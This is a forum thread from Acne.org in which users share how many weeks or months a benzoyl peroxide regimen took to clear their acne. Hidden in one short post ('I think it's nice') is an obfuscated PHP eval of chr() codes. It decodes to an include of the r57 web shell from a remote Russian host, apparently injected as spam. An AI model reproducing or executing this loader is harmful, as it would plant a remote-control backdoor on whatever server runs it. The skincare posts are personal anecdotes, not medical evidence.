Acne.org
Search In
Find results that contain...
Find results in...
JdM240sX

How Long did it take you to see results?

>< im on week 3 and i grew a like 4 pimples from when i started and i was wondering when did you guys see results? obviously im not with that whatyouexpect chart lol

so when did you guys see results?

I was completely clear after 1.5 weeks. On week 4 or 5 now (Been clearn for weeks now I lost track lol!). I use a lot of BP though.

yea on thursday this week itll be the 14th day =) but im hoping monday tuesday if possibly wendsday and if it comes to it thursday =(

i saw improvement by week 2, then a breakout, then cleaing till week 4, breakout again, clear by week 5. now it just feels liek sometimes i might get some pimples, but the bp seems to hold them down. on week 8 now.

Mine took about 2 months........still get the odd spot thou, but it has cleared me up alot.rx

saw results straight away but took me over a year to refine my regimen to something that has got me 95% clear.

Was clear of the acne at about 1 or 2 months. Experienced breakouts occasionally (once or twice a month usually) until the 7 month mark. After that, no breakouts. I'm on the 11th month now, only one odd mark left which was there since the beginning of the regimen; doesnt seem to go away :mad:. Haha I have never skipped at application, not even once, in my 11 months of CSR, sad :doubt: .Stick with it, it should clear you up. Give it like 3 months and don't deviate.

I think it's nice

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

My skin is completely clear now, but it took almost 10 months for that to happen. I began the regimen in May 05. I noticed some improvement in the first few months, but I wasn't totally clear until March 06. Since then, I have only had one single pimple in two months!

It took my skin 2 1/2 to 3 months to see some lasting results.

Prior to this point, my skin had a ton of ups and downs, sometimes better than pre-Regimen, sometimes waaaaay worse.

At this point, though (~102 days in), I've gotten rid of 90%+ of my acne. I've gotten two pimples in the past two weeks, one of which I caused by picking at a clogged pore... so I can say that I've 'legitimately' gotten one pimple in the past two weeks, compared with the multiple pimples I'd get per DAY before I started the Regimen.

(red marks and scars, however, still remain... I have one 'red mark' that's been there for over five months, and it's hardly faded!)

lol you guys are lucky >< my forhead nose and eveywhere else is clear except my CHEEKS omgots its like pimples only grow on my cheeks lol

i saw results within the first few weeks, then i had a bad break out. i had like 9 cysts like acne all at once. now 4 months into the regimen, I am 100% clear. i just have a few red marks to take care of

it took me only over night to see results so i juss spot treat .. if i put it on a pimple that starts to look ed i put BP on it and it ususally gone almost by morning

No results so far...actually breaking out worse than ever.

Im still somewhat hopeful though.....Maybe theres a reason why i'm breaking out so bad???